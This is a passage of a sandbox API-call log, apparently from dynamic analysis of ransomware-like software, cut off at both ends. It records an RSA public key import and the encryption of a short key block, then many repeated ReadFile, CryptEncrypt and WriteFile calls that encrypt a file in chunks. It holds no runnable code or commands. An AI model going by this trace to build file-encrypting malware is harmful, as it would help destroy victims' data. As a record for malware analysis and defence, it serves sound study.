szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e71618) returned 1 [0261.319] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71618, dwCertEncodingType=0x1, pInfo=0x2eab6e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab710*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab718*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7dd00) returned 1 [0261.319] CryptEncrypt (in: hKey=0x2e7dd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.319] CryptEncrypt (in: hKey=0x2e7dd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71ae0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e71ae0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.319] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e71ae0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e71ae0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.320] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.321] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.322] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.328] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.328] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.328] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.329] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.329] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.329] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.329] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.329] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.329] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.330] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.331] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.331] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.332] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.332] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.332] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.332] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.332] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.333] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.333] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.334] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: 